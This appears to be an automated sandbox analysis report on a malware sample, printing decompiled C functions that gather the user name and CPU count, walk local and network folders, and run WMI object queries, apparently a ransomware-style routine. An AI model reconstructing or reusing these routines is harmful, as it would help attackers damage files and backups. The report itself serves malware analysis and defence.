                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbad5
                                                                                                                                                            0x009cbab3
                                                                                                                                                            0x009cbab5
                                                                                                                                                            0x009cbaba
                                                                                                                                                            0x009cbaba
                                                                                                                                                            0x009cbabd
                                                                                                                                                            0x009cbabe
                                                                                                                                                            0x009cbabe
                                                                                                                                                            0x009cbac1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbac1
                                                                                                                                                            0x009cbab1
                                                                                                                                                            0x009cb9f9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cb9ff
                                                                                                                                                            0x009cba00
                                                                                                                                                            0x009cba06
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cba0c
                                                                                                                                                            0x009cba0d
                                                                                                                                                            0x009cba13
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cba19
                                                                                                                                                            0x009cba1a
                                                                                                                                                            0x009cba29
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cba2f
                                                                                                                                                            0x009cba30
                                                                                                                                                            0x009cba37
                                                                                                                                                            0x009cba3c
                                                                                                                                                            0x009cba42
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cba48
                                                                                                                                                            0x009cba49
                                                                                                                                                            0x009cba50
                                                                                                                                                            0x009cba55
                                                                                                                                                            0x009cba5b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cba61
                                                                                                                                                            0x009cba62
                                                                                                                                                            0x009cba69
                                                                                                                                                            0x009cba6e
                                                                                                                                                            0x009cba74
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cba7a
                                                                                                                                                            0x009cba93
                                                                                                                                                            0x009cbaa2
                                                                                                                                                            0x009cbaa9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cbaa9
                                                                                                                                                            0x009cb93a
                                                                                                                                                            0x009cb93a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009cb93a
                                                                                                                                                            0x009cb938
                                                                                                                                                            0x009cb8e4
                                                                                                                                                            0x009cb8c8

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: -
                                                                                                                                                            • API String ID: 0-2547889144
                                                                                                                                                            • Opcode ID: bec80a3cdb5ca75ec6d60ce1cddd93174733d632bcac847c0448635cbdb77f5d
                                                                                                                                                            • Instruction ID: ab712f22e8e665be4c3d6bfc2cae624c3b325bda1ff083700813c0dd617e329b
                                                                                                                                                            • Opcode Fuzzy Hash: bec80a3cdb5ca75ec6d60ce1cddd93174733d632bcac847c0448635cbdb77f5d
                                                                                                                                                            • Instruction Fuzzy Hash: 5B82F2B1D006098FDF24CFA9C891BBEBFB8BF49310F68855ED459A7295C3349942CB52
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C505F() {
                                                                                                                                                            				long _v8;
                                                                                                                                                            				WCHAR* _t3;
                                                                                                                                                            				int _t5;
                                                                                                                                                            				WCHAR* _t11;
                                                                                                                                                            
                                                                                                                                                            				_t3 = E009C47AB(0x202);
                                                                                                                                                            				_t11 = _t3;
                                                                                                                                                            				if(_t11 != 0) {
                                                                                                                                                            					_v8 = 0x101;
                                                                                                                                                            					_t5 = GetUserNameW(_t11,  &_v8); // executed
                                                                                                                                                            					if(_t5 == 0) {
                                                                                                                                                            						E009C47F8(_t11);
                                                                                                                                                            						_t11 = 0;
                                                                                                                                                            					}
                                                                                                                                                            					_t3 = _t11;
                                                                                                                                                            				}
                                                                                                                                                            				return _t3;
                                                                                                                                                            			}








                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            • GetUserNameW.ADVAPI32(00000000,009C1981), ref: 009C5081
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CreateNameProcessUser
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 499767188-0
                                                                                                                                                            • Opcode ID: 73a1ce7e54d360cd4211c1217a8747cc6003b550d1309185a3d03cf60bad8030
                                                                                                                                                            • Instruction ID: 0d0ac4e35d1d7c507ce97cf0a278b841b98d3ba5257c4ff661e04a5057baed11
                                                                                                                                                            • Opcode Fuzzy Hash: 73a1ce7e54d360cd4211c1217a8747cc6003b550d1309185a3d03cf60bad8030
                                                                                                                                                            • Instruction Fuzzy Hash: ABE02632E12A39679220D7A89C09F9BB79CCB02760B02014EFC04D2204EB905E0001D2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C5370() {
                                                                                                                                                            				struct _SYSTEM_INFO _v40;
                                                                                                                                                            
                                                                                                                                                            				GetSystemInfo( &_v40); // executed
                                                                                                                                                            				return _v40.dwNumberOfProcessors;
                                                                                                                                                            			}





                                                                                                                                                            APIs
                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,009C33C5,?,00000000,00000000,009C3571,00000000,00000000), ref: 009C537A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 31276548-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            C-Code - Quality: 16%
                                                                                                                                                            			E009C291D() {
                                                                                                                                                            				char _v8;
                                                                                                                                                            				void* _v12;
                                                                                                                                                            				void* _v16;
                                                                                                                                                            				void* _v20;
                                                                                                                                                            				void* _v24;
                                                                                                                                                            				void* _v28;
                                                                                                                                                            				short _v30;
                                                                                                                                                            				char _v36;
                                                                                                                                                            				char _v44;
                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                            				char _v60;
                                                                                                                                                            				short _v64;
                                                                                                                                                            				char _v84;
                                                                                                                                                            				short _v88;
                                                                                                                                                            				short _v136;
                                                                                                                                                            				short _v140;
                                                                                                                                                            				char _v200;
                                                                                                                                                            				short _v456;
                                                                                                                                                            				void* _t55;
                                                                                                                                                            				void* _t57;
                                                                                                                                                            				void* _t58;
                                                                                                                                                            				intOrPtr* _t61;
                                                                                                                                                            				void* _t69;
                                                                                                                                                            				void* _t71;
                                                                                                                                                            				void* _t79;
                                                                                                                                                            				void* _t81;
                                                                                                                                                            				void* _t82;
                                                                                                                                                            				intOrPtr* _t83;
                                                                                                                                                            				intOrPtr* _t85;
                                                                                                                                                            				intOrPtr* _t87;
                                                                                                                                                            				int _t98;
                                                                                                                                                            				void* _t102;
                                                                                                                                                            				intOrPtr* _t107;
                                                                                                                                                            				void* _t111;
                                                                                                                                                            				intOrPtr* _t115;
                                                                                                                                                            				intOrPtr* _t117;
                                                                                                                                                            				intOrPtr* _t118;
                                                                                                                                                            				intOrPtr* _t122;
                                                                                                                                                            				intOrPtr* _t132;
                                                                                                                                                            				intOrPtr* _t135;
                                                                                                                                                            				short _t137;
                                                                                                                                                            				void* _t144;
                                                                                                                                                            				void* _t145;
                                                                                                                                                            				void* _t146;
                                                                                                                                                            
                                                                                                                                                            				_t55 =  *0x9d1078(0, 0); // executed
                                                                                                                                                            				if(_t55 >= 0) {
                                                                                                                                                            					_t57 =  *0x9d12b4(0x9cd138, 0, 1, 0x9cd128,  &_v16); // executed
                                                                                                                                                            					if(_t57 >= 0) {
                                                                                                                                                            						_t58 = E009C5262(); // executed
                                                                                                                                                            						_t132 = __imp__#9;
                                                                                                                                                            						_t137 = 3;
                                                                                                                                                            						if(_t58 != 0) {
                                                                                                                                                            							__imp__#8( &_v44);
                                                                                                                                                            							_t107 = _v16;
                                                                                                                                                            							_v44 = _t137;
                                                                                                                                                            							_v36 = 0x40;
                                                                                                                                                            							 *((intOrPtr*)( *_t107 + 0x20))(_t107, L"__ProviderArchitecture", 0,  &_v44);
                                                                                                                                                            							 *_t132( &_v44);
                                                                                                                                                            						}
                                                                                                                                                            						_push( &_v28);
                                                                                                                                                            						_push(0x9cd168);
                                                                                                                                                            						_push(0x4401);
                                                                                                                                                            						_push(0);
                                                                                                                                                            						_push(0x9cd148);
                                                                                                                                                            						if( *0x9d12b4() < 0) {
                                                                                                                                                            							L18:
                                                                                                                                                            							_t61 = _v28;
                                                                                                                                                            							 *((intOrPtr*)( *_t61 + 8))(_t61);
                                                                                                                                                            							 *0x9d1074(); // executed
                                                                                                                                                            							return 0;
                                                                                                                                                            						} else {
                                                                                                                                                            							E009C5DE2(0x9d0270, 0x954, 4, 0x14,  &_v84);
                                                                                                                                                            							_t115 = __imp__#2;
                                                                                                                                                            							_t145 = _t144 + 0x14;
                                                                                                                                                            							_v64 = 0;
                                                                                                                                                            							_t69 =  *_t115( &_v84);
                                                                                                                                                            							_t117 = _v28;
                                                                                                                                                            							_push( &_v12);
                                                                                                                                                            							_push(_v16);
                                                                                                                                                            							_push(0);
                                                                                                                                                            							_push(0);
                                                                                                                                                            							_push(0);
                                                                                                                                                            							_push(0);
                                                                                                                                                            							_push(0);
                                                                                                                                                            							_push(_t69);
                                                                                                                                                            							_push(_t117); // executed
                                                                                                                                                            							if( *((intOrPtr*)( *_t117 + 0xc))() < 0) {
                                                                                                                                                            								goto L18;
                                                                                                                                                            							}
                                                                                                                                                            							_t71 =  *0x9d1288(_v12, 0xa, 0, 0, 3, 3, 0, 0); // executed
                                                                                                                                                            							if(_t71 < 0) {
                                                                                                                                                            								goto L18;
                                                                                                                                                            							}
                                                                                                                                                            							_v20 = 0;
                                                                                                                                                            							E009C5DE2(0x9d0270, 0x143, 0xc, 6,  &_v36);
                                                                                                                                                            							_v30 = 0;
                                                                                                                                                            							E009C5DE2(0x9d0270, 0x4c5, 4, 0x3c,  &_v200);
                                                                                                                                                            							_t146 = _t145 + 0x28;
                                                                                                                                                            							_v140 = 0;
                                                                                                                                                            							_t79 =  *_t115( &_v36);
                                                                                                                                                            							_t81 =  *_t115( &_v200);
                                                                                                                                                            							_t118 = _v12;
                                                                                                                                                            							_t82 =  *((intOrPtr*)( *_t118 + 0x50))(_t118, _t79, _t81, 0x30, 0,  &_v20);
                                                                                                                                                            							_t135 = __imp__#9;
                                                                                                                                                            							if(_t82 < 0) {
                                                                                                                                                            								goto L18;
                                                                                                                                                            							}
                                                                                                                                                            							while(1) {
                                                                                                                                                            								_t83 = _v20;
                                                                                                                                                            								_v8 = 0;
                                                                                                                                                            								 *((intOrPtr*)( *_t83 + 0x10))(_t83, 0xffffffff, 1,  &_v24,  &_v8);
                                                                                                                                                            								if(_v8 == 0) {
                                                                                                                                                            									goto L18;
                                                                                                                                                            								}
                                                                                                                                                            								_t85 = _v24;
                                                                                                                                                            								_push(0);
                                                                                                                                                            								_push(0);
                                                                                                                                                            								_push( &_v60);
                                                                                                                                                            								_push(0);
                                                                                                                                                            								_push(L"id");
                                                                                                                                                            								_push(_t85);
                                                                                                                                                            								if( *((intOrPtr*)( *_t85 + 0x10))() >= 0 && _v60 == 8) {
                                                                                                                                                            									E009C4832( &_v456, 0, 0x100);
                                                                                                                                                            									E009C5DE2(0x9d0270, 0x160, 4, 0x30,  &_v136);
                                                                                                                                                            									_v88 = 0;
                                                                                                                                                            									_t98 = wsprintfW( &_v456,  &_v136, _v52);
                                                                                                                                                            									_t146 = _t146 + 0x2c;
                                                                                                                                                            									if(_t98 != 0) {
                                                                                                                                                            										_t102 =  *_t115( &_v456);
                                                                                                                                                            										_t122 = _v12;
                                                                                                                                                            										 *((intOrPtr*)( *_t122 + 0x40))(_t122, _t102, 0, _v16, 0);
                                                                                                                                                            										E009C4832( &_v456, 0, 0x80);
                                                                                                                                                            										_t146 = _t146 + 0xc;
                                                                                                                                                            									}
                                                                                                                                                            									 *_t135( &_v60);
                                                                                                                                                            								}
                                                                                                                                                            								_t87 = _v24;
                                                                                                                                                            								 *((intOrPtr*)( *_t87 + 8))(_t87);
                                                                                                                                                            								 *_t135( &_v60);
                                                                                                                                                            							}
                                                                                                                                                            							goto L18;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t111 = 2;
                                                                                                                                                            					return _t111;
                                                                                                                                                            				}
                                                                                                                                                            				return 1;
                                                                                                                                                            			}


                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: @$__ProviderArchitecture
                                                                                                                                                            • API String ID: 0-691293667
                                                                                                                                                            • Opcode ID: 468b2fba1cb7395c442fc5673fedb48db36f5f7cc2489297162673580e1cdcf9
                                                                                                                                                            • Instruction ID: ac63c0127a1c3a348cdfb7c0bda4234c8e6dd23b965e6bccefcd5415f6652a3b
                                                                                                                                                            • Opcode Fuzzy Hash: 468b2fba1cb7395c442fc5673fedb48db36f5f7cc2489297162673580e1cdcf9
                                                                                                                                                            • Instruction Fuzzy Hash: 1F715771E41219BBDB20DBA1CC89FDFBBBCAF49754F004469B605EB180D670AA45CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                            			E009C32DE() {
                                                                                                                                                            				WCHAR* _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				void* _v16;
                                                                                                                                                            				char _v20;
                                                                                                                                                            				char _v24;
                                                                                                                                                            				char _v36;
                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v48;
                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v52;
                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v56;
                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v60;
                                                                                                                                                            				char* _v68;
                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v72;
                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                            				void _v84;
                                                                                                                                                            				WCHAR* _t48;
                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                            				void* _t53;
                                                                                                                                                            				void* _t56;
                                                                                                                                                            				WCHAR* _t61;
                                                                                                                                                            				WCHAR* _t62;
                                                                                                                                                            				WCHAR* _t66;
                                                                                                                                                            				WCHAR* _t68;
                                                                                                                                                            				intOrPtr _t69;
                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                            				signed int _t90;
                                                                                                                                                            				intOrPtr* _t92;
                                                                                                                                                            				WCHAR* _t99;
                                                                                                                                                            				WCHAR* _t105;
                                                                                                                                                            				signed int _t107;
                                                                                                                                                            				void* _t109;
                                                                                                                                                            				short _t110;
                                                                                                                                                            				void* _t112;
                                                                                                                                                            				WCHAR* _t113;
                                                                                                                                                            				WCHAR* _t116;
                                                                                                                                                            				void* _t117;
                                                                                                                                                            				void* _t118;
                                                                                                                                                            				WCHAR* _t120;
                                                                                                                                                            
                                                                                                                                                            				_t112 = 1;
                                                                                                                                                            				_t116 = 0;
                                                                                                                                                            				_t120 =  *0x9d22ac; // 0x0
                                                                                                                                                            				if(_t120 == 0) {
                                                                                                                                                            					L12:
                                                                                                                                                            					 *0x9d1d08 = 0;
                                                                                                                                                            					 *0x9d1d0c = 0;
                                                                                                                                                            					 *0x9d1d10 = 0;
                                                                                                                                                            					 *0x9d1d14 = 0;
                                                                                                                                                            					 *0x9d1d04 = 0; // executed
                                                                                                                                                            					_t48 = E009C748F(__eflags,  &_v36, 0, 0, E009C3571); // executed
                                                                                                                                                            					_t118 = _t117 + 0x10;
                                                                                                                                                            					__eflags = _t48;
                                                                                                                                                            					if(_t48 == 0) {
                                                                                                                                                            						L2:
                                                                                                                                                            						return 0;
                                                                                                                                                            					}
                                                                                                                                                            					_v84 = 0;
                                                                                                                                                            					_v80 = E009C2D63;
                                                                                                                                                            					_v76 = E009C3927;
                                                                                                                                                            					_v72 = 0;
                                                                                                                                                            					_v68 =  &_v36;
                                                                                                                                                            					_v60 = 0;
                                                                                                                                                            					_v56 = 0;
                                                                                                                                                            					_v52 = 0;
                                                                                                                                                            					_v48 = 0;
                                                                                                                                                            					_v44 = E009C2D28;
                                                                                                                                                            					_v40 = E009C38BF;
                                                                                                                                                            					__eflags =  *0x9d22ac; // 0x0
                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                            						__eflags =  *0x9d22a8; // 0x1
                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                            							E009C797A( &_v84); // executed
                                                                                                                                                            						}
                                                                                                                                                            						__eflags =  *0x9d22a4; // 0x1
                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                            							_t56 = CreateThread(0, 0, E009C7B7E,  &_v84, 0, 0);
                                                                                                                                                            							__eflags = _t56;
                                                                                                                                                            							if(_t56 != 0) {
                                                                                                                                                            								WaitForSingleObject(_t56, 0xffffffff);
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L28:
                                                                                                                                                            						_t51 =  *0x9d1d14; // 0x0
                                                                                                                                                            						__eflags = _t51 - _v48;
                                                                                                                                                            						if(__eflags > 0) {
                                                                                                                                                            							L33:
                                                                                                                                                            							E009C73E0( &_v36, 0x9d1d04);
                                                                                                                                                            							__eflags = 0;
                                                                                                                                                            							_t53 = 1;
                                                                                                                                                            							L34:
                                                                                                                                                            							return _t53;
                                                                                                                                                            						}
                                                                                                                                                            						if(__eflags >= 0) {
                                                                                                                                                            							L32:
                                                                                                                                                            							_t51 =  *0x9d1d10; // 0x68
                                                                                                                                                            							__eflags = _t51 - _v52;
                                                                                                                                                            							if(_t51 < _v52) {
                                                                                                                                                            								do {
                                                                                                                                                            									goto L30;
                                                                                                                                                            								} while (__eflags < 0);
                                                                                                                                                            								if(__eflags > 0) {
                                                                                                                                                            									goto L33;
                                                                                                                                                            								}
                                                                                                                                                            								goto L32;
                                                                                                                                                            							}
                                                                                                                                                            							goto L33;
                                                                                                                                                            						}
                                                                                                                                                            						L30:
                                                                                                                                                            						E009C568D(_t51, 0x64);
                                                                                                                                                            						_t51 =  *0x9d1d14; // 0x0
                                                                                                                                                            						__eflags = _t51 - _v48;
                                                                                                                                                            					}
                                                                                                                                                            					PathRemoveBackslashW(_t116);
                                                                                                                                                            					_t61 = PathIsDirectoryW(_t116);
                                                                                                                                                            					_push(_t116);
                                                                                                                                                            					__eflags = _t61;
                                                                                                                                                            					if(_t61 == 0) {
                                                                                                                                                            						_t62 = PathIsNetworkPathW();
                                                                                                                                                            						__eflags = _t62;
                                                                                                                                                            						if(_t62 == 0) {
                                                                                                                                                            							goto L28;
                                                                                                                                                            						}
                                                                                                                                                            						_t66 =  *0x9d112c(_t116, _t112,  &_v16, 0xffffffff,  &_v8,  &_v24, 0);
                                                                                                                                                            						__eflags = _t66;
                                                                                                                                                            						if(_t66 != 0) {
                                                                                                                                                            							goto L2;
                                                                                                                                                            						}
                                                                                                                                                            						PathAddBackslashW(_t116);
                                                                                                                                                            						_t92 = _v16;
                                                                                                                                                            						_t68 = E009C47AB(0x800);
                                                                                                                                                            						_t99 = _v8;
                                                                                                                                                            						_t113 = _t68;
                                                                                                                                                            						_t69 = 0;
                                                                                                                                                            						_v12 = 0;
                                                                                                                                                            						__eflags = _t99;
                                                                                                                                                            						if(_t99 == 0) {
                                                                                                                                                            							L22:
                                                                                                                                                            							 *0x9d10a0(_v16);
                                                                                                                                                            							goto L28;
                                                                                                                                                            						} else {
                                                                                                                                                            							goto L19;
                                                                                                                                                            						}
                                                                                                                                                            						do {
                                                                                                                                                            							L19:
                                                                                                                                                            							__eflags =  *(_t92 + 4) & 0x80000003;
                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                            								E009C60C5(__eflags, _t113, _t116);
                                                                                                                                                            								PathAddBackslashW(_t113);
                                                                                                                                                            								E009C60C5(__eflags, _t113,  *_t92);
                                                                                                                                                            								PathAddBackslashW(_t113);
                                                                                                                                                            								E009C761A(_t113,  &_v84);
                                                                                                                                                            								E009C4832(_t113, 0, 0x800);
                                                                                                                                                            								_t99 = _v8;
                                                                                                                                                            								_t118 = _t118 + 0x14;
                                                                                                                                                            								_t69 = _v12;
                                                                                                                                                            							}
                                                                                                                                                            							_t69 = _t69 + 1;
                                                                                                                                                            							_t92 = _t92 + 0xc;
                                                                                                                                                            							_v12 = _t69;
                                                                                                                                                            							__eflags = _t69 - _t99;
                                                                                                                                                            						} while (_t69 < _t99);
                                                                                                                                                            						goto L22;
                                                                                                                                                            					}
                                                                                                                                                            					PathAddBackslashW();
                                                                                                                                                            					E009C761A(_t116,  &_v84);
                                                                                                                                                            					E009C47F8(_t116);
                                                                                                                                                            					goto L28;
                                                                                                                                                            				}
                                                                                                                                                            				_t114 = E009C4B43( &_v20);
                                                                                                                                                            				if(_t83 != 0) {
                                                                                                                                                            					__eflags = _v20 - 2;
                                                                                                                                                            					if(_v20 > 2) {
                                                                                                                                                            						_t105 =  *0x9d229c; // 0x0
                                                                                                                                                            						__eflags = _t105;
                                                                                                                                                            						_t84 =  *0x9d2278; // 0x0
                                                                                                                                                            						_t109 = 1;
                                                                                                                                                            						_t85 =  !=  ? _t109 : _t84;
                                                                                                                                                            						 *0x9d2278 =  !=  ? _t109 : _t84;
                                                                                                                                                            						__eflags =  *0x9d22a0; // 0x0
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							L7:
                                                                                                                                                            							_t116 = E009C47AB(0x208);
                                                                                                                                                            							__eflags = _t116;
                                                                                                                                                            							if(_t116 == 0) {
                                                                                                                                                            								goto L4;
                                                                                                                                                            							} else {
                                                                                                                                                            								E009C61A7(_t116,  *((intOrPtr*)(_t114 + 8)));
                                                                                                                                                            								E009C4B35(_t114);
                                                                                                                                                            								_t90 = E009C6250(_t116);
                                                                                                                                                            								_t117 = _t117 + 0x10;
                                                                                                                                                            								_t112 = 1;
                                                                                                                                                            								_t107 =  *(_t116 + _t90 * 2 - 2) & 0x0000ffff;
                                                                                                                                                            								_t110 = 0x5c;
                                                                                                                                                            								__eflags = _t107 - _t110;
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									__eflags = _t107 - 0x22;
                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                            										_t116[_t90] = _t110;
                                                                                                                                                            									} else {
                                                                                                                                                            										 *(_t116 + _t90 * 2 - 2) = _t110;
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            								goto L12;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						 *0x9d2278 = 0;
                                                                                                                                                            						__eflags = _t105;
                                                                                                                                                            						if(_t105 != 0) {
                                                                                                                                                            							goto L2;
                                                                                                                                                            						}
                                                                                                                                                            						goto L7;
                                                                                                                                                            					}
                                                                                                                                                            					L4:
                                                                                                                                                            					E009C4B35(_t114);
                                                                                                                                                            					_t53 = 0;
                                                                                                                                                            					goto L34;
                                                                                                                                                            				}
                                                                                                                                                            				goto L2;
                                                                                                                                                            			}












































                                                                                                                                                            APIs
                                                                                                                                                            • PathRemoveBackslashW.SHLWAPI(00000000,?,00000000,00000000), ref: 009C3411
                                                                                                                                                            • PathIsDirectoryW.SHLWAPI(00000000), ref: 009C3418
                                                                                                                                                            • PathAddBackslashW.SHLWAPI(00000000,?,00000000,00000000), ref: 009C3423
                                                                                                                                                              • Part of subcall function 009C4B43: GetCommandLineW.KERNEL32(0000000E,?,009C13D4,?,00000000,009D0270,?,?,009C1AFC,?,009D0270,000001A1,00000006,0000000E,?), ref: 009C4B49
                                                                                                                                                              • Part of subcall function 009C4B43: CommandLineToArgvW.SHELL32(00000000,?,009C13D4,?,00000000,009D0270,?,?,009C1AFC,?,009D0270,000001A1,00000006,0000000E,?), ref: 009C4B50
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Path$BackslashCommandLine$ArgvDirectoryRemove
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1603908121-0
                                                                                                                                                            • Opcode ID: dd731598aa46f92284f34b06c9fe62810a9f13a49d1001dac20c847322c718c4
                                                                                                                                                            • Instruction ID: 528cf3585409d66772ff64c07fadce5b7e68289824317b13f901b9cd4ce0dc12
                                                                                                                                                            • Opcode Fuzzy Hash: dd731598aa46f92284f34b06c9fe62810a9f13a49d1001dac20c847322c718c4
                                                                                                                                                            • Instruction Fuzzy Hash: E571D072D49205AFDB14EFA5EC85FAEB7BCFF44310B10C42EF505A2191DB308A809B22
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 153 9c3989-9c399f 155 9c39a9-9c39d9 153->155 156 9c39a1-9c39a4 153->156 160 9c39e8-9c3a37 call 9c5de2 SysAllocString SysFreeString 155->160 161 9c39db-9c39e3 155->161 157 9c3b87-9c3b8b 156->157 167 9c3a4f-9c3b09 call 9c5de2 * 2 SysAllocString * 2 160->167 168 9c3a39-9c3a4a 160->168 165 9c3b86 161->165 165->157 180 9c3b0d-9c3b1f SysFreeString * 2 167->180 173 9c3b85 168->173 173->165 181 9c3b26-9c3b40 GetCurrentProcess WaitForSingleObject 180->181 182 9c3b21-9c3b24 180->182 183 9c3b42-9c3b83 181->183 182->183 183->173
